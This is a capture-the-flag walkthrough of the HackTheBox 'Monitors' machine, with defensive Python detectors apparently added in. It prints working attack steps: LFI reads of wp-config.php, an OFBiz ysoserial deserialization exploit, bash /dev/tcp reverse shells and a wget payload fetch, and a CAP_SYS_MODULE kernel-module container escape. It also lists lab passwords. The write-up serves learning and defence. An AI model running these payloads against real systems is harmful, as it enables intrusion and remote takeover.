
@0xEmbo
Created October 2, 2021 14:24

10.10.10.238

Nmap Scan

nmap -sC -sV -oA monitors 10.10.10.238

Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-30 21:36 EET
Nmap scan report for 10.10.10.238
Host is up (0.096s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 ba:cc:cd:81:fc:91:55:f3:f6:a9:1f:4e:e8:be:e5:2e (RSA)
|   256 69:43:37:6a:18:09:f5:e7:7a:67:b8:18:11:ea:d7:65 (ECDSA)
|_  256 5d:5e:3f:67:ef:7d:76:23:15:11:4b:53:f8:41:3a:94 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=iso-8859-1).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

There are two open ports: 22 (SSH) and 80 (HTTP). Neither service version has a known critical vulnerability, so let's enumerate port 80.

HTTP Enumeration

![[Pasted image 20210930214209.png]] We can't access the site by IP, but the response reveals the domain monitors.htb, so let's add it to /etc/hosts and visit it by name. Whenever you have a domain name, also run a subdomain brute-forcer; you may find hidden subdomains. In my case I couldn't find any.

![[Pasted image 20210930220822.png]] It's a WordPress site. Notice the copyright year (2018): it's an old site, so we may find a vulnerability in WordPress itself or in one of its plugins.

The first thing I did was run wpscan against the site to enumerate WordPress: wpscan --url http://monitors.htb/ --detection-mode aggressive -e at,ap,u

It identified the WordPress version (5.5.1) and a plugin, wp-with-spritz (1.0), which is vulnerable to LFI.

PoC: https://www.exploit-db.com/exploits/44544 ![[Pasted image 20210930221341.png]]

Requesting the same path the exploit uses, we were able to read /etc/passwd, which confirms the LFI vulnerability. ![[Pasted image 20210930221708.png]]

Now let's read Apache's sites-enabled directory; there may be a virtual host that the subdomain brute-force didn't find. Let's use curl, because its output is much easier to read.

![[Pasted image 20210930231754.png]] There is a subdomain, cacti-admin.monitors.htb, to add to /etc/hosts, and two conf files to check.

The domain monitors.htb has its files located in /var/www/wordpress. ![[Pasted image 20210930232517.png]]

And the files of the subdomain cacti-admin.monitors.htb are in /usr/share/cacti. ![[Pasted image 20210930232643.png]]

We may need this information later. Now let's add this subdomain to our hosts file and visit it. ![[Pasted image 20210930232903.png]] This subdomain is running Cacti (1.2.12); let's google this version for public exploits.

Cacti is an open-source, web-based network monitoring and graphing tool designed as a front-end application for the open-source, industry-standard data logging tool RRDtool. Cacti allows a user to poll services at predetermined intervals and graph the resulting data.

I found an authenticated SQL injection / RCE, but we don't have any credentials yet.

Exploit: https://www.exploit-db.com/exploits/49810

But as you may know, WordPress has a file called wp-config.php which contains the database credentials.

So let's read it through the LFI we found earlier, using the php filter wrapper. ![[Pasted image 20210930233759.png]]

Then we base64-decode the string, and we have a password: BestAdministrator@2020! ![[Pasted image 20210930233848.png]]
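From the defender's side, this whole chain (traversal to /etc/passwd, then php://filter to pull wp-config.php) leaves a distinctive trail in the Apache access log. The detector below is an added example, not code from the write-up; the log lines and the plugin handler path in them are constructed, and matching keys on the query-string values (traversal, PHP stream wrappers, sensitive file names) rather than on that path.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed Apache combined-log lines (not from the write-up). The plugin
# handler path is a placeholder; matching keys on the query values only.
SAMPLE_LOG = """\
10.10.14.5 - - [30/Sep/2021:22:17:08 +0000] "GET /wp-content/plugins/wp-with-spritz/filter.php?url=../../../../etc/passwd HTTP/1.1" 200 2176
10.10.14.5 - - [30/Sep/2021:22:37:59 +0000] "GET /wp-content/plugins/wp-with-spritz/filter.php?url=php://filter/convert.base64-encode/resource=/var/www/wordpress/wp-config.php HTTP/1.1" 200 4410
10.10.14.5 - - [30/Sep/2021:22:38:10 +0000] "GET /wp-content/plugins/wp-with-spritz/filter.php?url=%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 2176
10.10.14.9 - - [30/Sep/2021:22:40:01 +0000] "GET /?p=12 HTTP/1.1" 200 9134
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# What a defender looks for inside query-parameter *values*.
SIGNS = [
    ("traversal", re.compile(r"\.\.[/\\]")),
    ("php_wrapper", re.compile(r"^(php|data|expect|phar)://", re.I)),
    ("sensitive_file", re.compile(r"/etc/(passwd|shadow)|wp-config\.php", re.I)),
]

def decode(value, rounds=3):
    """URL-decode until stable so double-encoded traversal is still caught."""
    for _ in range(rounds):
        new = unquote(value)
        if new == value:
            break
        value = new
    return value

def inspect_line(line):
    """Return (ip, target, sorted reasons) or None when benign or unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = m.group("target")
    reasons = set()
    for _, raw in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        val = decode(raw)  # parse_qsl already decoded once; this handles %25-style double encoding
        reasons.update(name for name, rx in SIGNS if rx.search(val))
    return (m.group("ip"), target, sorted(reasons)) if reasons else None

def scan_log(text):
    """All suspicious requests in an access-log text, in file order."""
    return [h for h in map(inspect_line, text.splitlines()) if h]
```

Run scan_log over the text of an access log; the three flagged sample lines come back tagged with the reason, the ordinary WordPress request does not.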

Initial Foothold

Let's try to log in to Cacti. wpadmin:BestAdministrator@2020! didn't work, but admin:BestAdministrator@2020! did, and we are logged in. ![[Pasted image 20210930234013.png]]

Now let's use the exploit to get a shell. ![[Pasted image 20211001163842.png]] We have a shell as www-data; now let's enumerate the box.

Lateral Movement

While enumerating the box, I found a .backup directory in marcus's home directory, but we can't access it.

![[Pasted image 20211001190647.png]]

After wasting a lot of time, I found the Cacti Backup Service file, which executes /home/marcus/.backup/backup.sh. ![[Pasted image 20211001191411.png]]

And we can read backup.sh even though we couldn't list the .backup directory. ![[Pasted image 20211001191551.png]] It contains a config_pass with the password VerticalEdge2020.

Let's try SSH as user marcus with this password. ![[Pasted image 20211001192000.png]] And we are now user marcus.

Getting root

There's a notes.txt file in the home directory saying to update the docker image for production use. ![[Pasted image 20211001201415.png]]

I don't have permission to use the docker command, and the docker version doesn't have serious vulnerabilities, so let's look for something else. ![[Pasted image 20211001201635.png]]

![[Pasted image 20211001201732.png]] There is a service on port 8443 listening on localhost only, so let's set up port forwarding to reach it from our machine: ssh -L 127.0.0.1:9001:127.0.0.1:8443 marcus@10.10.10.238 ![[Pasted image 20211001201924.png]]

Now traffic to port 9001 on our machine is forwarded to port 8443 on the target. Let's visit http://127.0.0.1:9001 ![[Pasted image 20211001202133.png]] It's using HTTPS, not HTTP, so visit https://127.0.0.1:9001 instead. ![[Pasted image 20211001202231.png]] It's running Tomcat 9.0.31, but I couldn't find any helpful vulnerability for this version, so let's run a directory buster.

gobuster dir -u https://127.0.0.1:9001 -k -w /usr/share/seclist/Discovery/Web-Content/raft-small-words.txt ![[Pasted image 20211001202426.png]]

Visiting most of these directories forwards me to this login page, which is OFBiz 17.12.01. ![[Pasted image 20211001203046.png]]

I tried default credentials, but they didn't work, so I looked for public exploits and found this RCE.

Exploit: https://github.com/g33xter/CVE-2020-9496

Exploitation Steps:

1- Create a bash file that contains a reverse shell.

cat shell.sh
	#!/bin/bash
	/bin/bash -i >& /dev/tcp/10.10.x.x/8001 0>&1

2- Download the ysoserial tool, which generates payloads that exploit unsafe Java object deserialization.

Link: https://jitpack.io/com/github/frohoff/ysoserial/master-d367e379d9-1/ysoserial-master-d367e379d9-1.jar

3- Generate the payload with the ysoserial JAR file:

java -jar ysoserial-master-d367e379d9-1.jar CommonsBeanutils1 "wget 10.10.x.x/shell.sh -O /tmp/shell.sh" | base64 | tr -d "\n"

4- Copy the generated string and start a Python web server: sudo python3 -m http.server 80

5- Use the below curl command to execute our payload.

$ curl https://127.0.0.1:9001/webtools/control/xmlrpc -X POST -v -d '<?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value><struct><member><name>test</name><value><serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">PAYLOAD</serializable></value></member></struct></value></param></params></methodCall>' -k  -H 'Content-Type:application/xml'

After running the curl command, I got a hit on my Python server. Our shell script is now on the server in /tmp; next we create another payload to execute it. ![[Pasted image 20211001210109.png]]

6- Run a netcat listener: nc -nvlp 1337

7- Create another payload to execute the downloaded shell file.

java -jar ysoserial-master-d367e379d9-1.jar CommonsBeanutils1 "bash /tmp/shell.sh" | base64 | tr -d "\n"

8- Copy the generated string and paste it inside the curl command.
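From the defender's side, the request in step 5 has a recognisable shape: an XML-RPC struct member carrying a serializable element in the Apache XML-RPC extensions namespace, whose base64 body starts with the Java serialization stream header (AC ED 00 05). The classifier below is an added example, not code from the write-up or the exploit repository; the request bodies are constructed, and the base64 blob is only the stream header plus filler, not a gadget chain.

```python
import base64
import binascii
import xml.etree.ElementTree as ET

XMLRPC_EXT_NS = "http://ws.apache.org/xmlrpc/namespaces/extensions"
SERIALIZABLE_TAG = "{%s}serializable" % XMLRPC_EXT_NS
JAVA_SERIAL_MAGIC = b"\xac\xed\x00\x05"  # java.io.ObjectOutputStream stream header

# Constructed request bodies. The "payload" is the stream header plus filler,
# not a gadget chain; it is only there so the classifier has something to read.
FAKE_PAYLOAD = base64.b64encode(JAVA_SERIAL_MAGIC + b"\x73\x72\x00\x04test").decode()
MALICIOUS_BODY = (
    '<?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName>'
    '<params><param><value><struct><member><name>test</name><value>'
    '<serializable xmlns="%s">%s</serializable>'
    '</value></member></struct></value></param></params></methodCall>'
    % (XMLRPC_EXT_NS, FAKE_PAYLOAD)
)
BENIGN_BODY = (
    '<?xml version="1.0"?><methodCall><methodName>ping</methodName>'
    '<params><param><value><string>hello</string></value></param></params></methodCall>'
)

def inspect_xmlrpc(body):
    """Classify one XML-RPC POST body (e.g. one sent to /webtools/control/xmlrpc).

    Returns (verdict, detail) with verdict one of 'java-serialized',
    'serializable-element', 'clean' or 'unparsable'. In production parse
    untrusted XML with defusedxml; ElementTree is used here to stay stdlib-only.
    """
    try:
        root = ET.fromstring(body)
    except ET.ParseError as exc:
        return ("unparsable", str(exc))
    for el in root.iter(SERIALIZABLE_TAG):
        try:
            blob = base64.b64decode((el.text or "").strip(), validate=True)
        except binascii.Error:
            return ("serializable-element", "non-base64 content")
        if blob.startswith(JAVA_SERIAL_MAGIC):
            return ("java-serialized", "%d-byte Java object stream" % len(blob))
        return ("serializable-element", "%d bytes without Java stream header" % len(blob))
    return ("clean", root.findtext("methodName") or "")
```

A serializable element in that namespace has no business arriving from the internet at all, so the 'serializable-element' verdict is worth an alert even without the Java header; the real fix is running a patched OFBiz release.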

And we have a root shell, but inside a docker container (not on the main host), so we need to escape from the container. ![[Pasted image 20211001210755.png]]

Running capsh --print shows we have the CAP_SYS_MODULE capability, which can be abused to get a shell on the host machine. We will follow the steps in the following link to get a shell on the box.

https://book.hacktricks.xyz/linux-unix/privilege-escalation/linux-capabilities#example-with-environment-docker-breakout-2
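As an audit check from the defender's side (added here, not part of the write-up), the code below decodes the Cap* masks that capsh --print reads from /proc/self/status and reports whether the container's bounding set holds a capability that allows acting on the host kernel, CAP_SYS_MODULE among them. Docker does not grant CAP_SYS_MODULE by default; it only appears via --cap-add or --privileged. The status excerpts are constructed.

```python
import re

# Capability bit numbers from include/uapi/linux/capability.h (subset).
CAP_NAMES = {
    0: "CAP_CHOWN", 1: "CAP_DAC_OVERRIDE", 2: "CAP_DAC_READ_SEARCH", 3: "CAP_FOWNER",
    4: "CAP_FSETID", 5: "CAP_KILL", 6: "CAP_SETGID", 7: "CAP_SETUID", 8: "CAP_SETPCAP",
    10: "CAP_NET_BIND_SERVICE", 12: "CAP_NET_ADMIN", 13: "CAP_NET_RAW", 16: "CAP_SYS_MODULE",
    17: "CAP_SYS_RAWIO", 18: "CAP_SYS_CHROOT", 19: "CAP_SYS_PTRACE", 21: "CAP_SYS_ADMIN",
    27: "CAP_MKNOD", 29: "CAP_AUDIT_WRITE", 31: "CAP_SETFCAP",
}
# Capabilities that let root inside a container act on the host kernel or host files.
HOST_ESCAPE_CAPS = {"CAP_SYS_MODULE", "CAP_SYS_ADMIN", "CAP_SYS_RAWIO",
                    "CAP_SYS_PTRACE", "CAP_DAC_READ_SEARCH"}

# Constructed /proc/<pid>/status excerpts: Docker's default bounding set
# (0xa80425fb) and the same set with bit 16, CAP_SYS_MODULE, added (0xa80525fb).
DEFAULT_STATUS = """\
Name:\tbash
CapInh:\t0000000000000000
CapPrm:\t00000000a80425fb
CapEff:\t00000000a80425fb
CapBnd:\t00000000a80425fb
CapAmb:\t0000000000000000
"""
SYS_MODULE_STATUS = DEFAULT_STATUS.replace("a80425fb", "a80525fb")

def parse_cap_masks(status_text):
    """Map each Cap* line of /proc/<pid>/status to its integer bitmask."""
    return {m.group(1): int(m.group(2), 16)
            for m in re.finditer(r"^(Cap\w+):\s*([0-9a-fA-F]+)$", status_text, re.M)}

def decode_mask(mask):
    """Names of the set bits; bits not in CAP_NAMES come back as CAP_<n>."""
    return {CAP_NAMES.get(b, "CAP_%d" % b) for b in range(64) if mask >> b & 1}

def audit(status_text):
    """Escape-relevant capabilities in the bounding set, i.e. what root in the
    container can ever gain regardless of the current effective set."""
    masks = parse_cap_masks(status_text)
    return sorted(decode_mask(masks.get("CapBnd", 0)) & HOST_ESCAPE_CAPS)
```

Inside a container, audit(open("/proc/self/status").read()) returning anything but an empty list is a finding to take to whoever wrote the docker run line.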

First we create a kernel module that contains our reverse shell. Note that the IP address in the code is the IP of the target machine (not ours), because we can't reach the docker container directly. reverse-shell.c

#include <linux/kmod.h>
#include <linux/module.h>
MODULE_LICENSE("GPL");
MODULE_AUTHOR("AttackDefense");
MODULE_DESCRIPTION("LKM reverse shell module");
MODULE_VERSION("1.0");

char* argv[] = {"/bin/bash","-c","bash -i >& /dev/tcp/10.10.10.238/1337 0>&1", NULL};
static char* envp[] = {"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", NULL };

// call_usermodehelper function is used to create user mode processes from kernel space
static int __init reverse_shell_init(void) {
    return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
}

static void __exit reverse_shell_exit(void) {
    printk(KERN_INFO "Exiting\n");
}

module_init(reverse_shell_init);
module_exit(reverse_shell_exit);

Then we create a Makefile to compile it. Makefile

obj-m +=reverse-shell.o

all:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules

clean:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean

Then run make to compile the code. ![[Pasted image 20211001225658.png]]

Finally, run a netcat listener on the host machine (not our machine) and run insmod reverse-shell.ko in the docker shell. ![[Pasted image 20211001225725.png]]

And we are now root on Monitors! ![[Pasted image 20211001225810.png]]
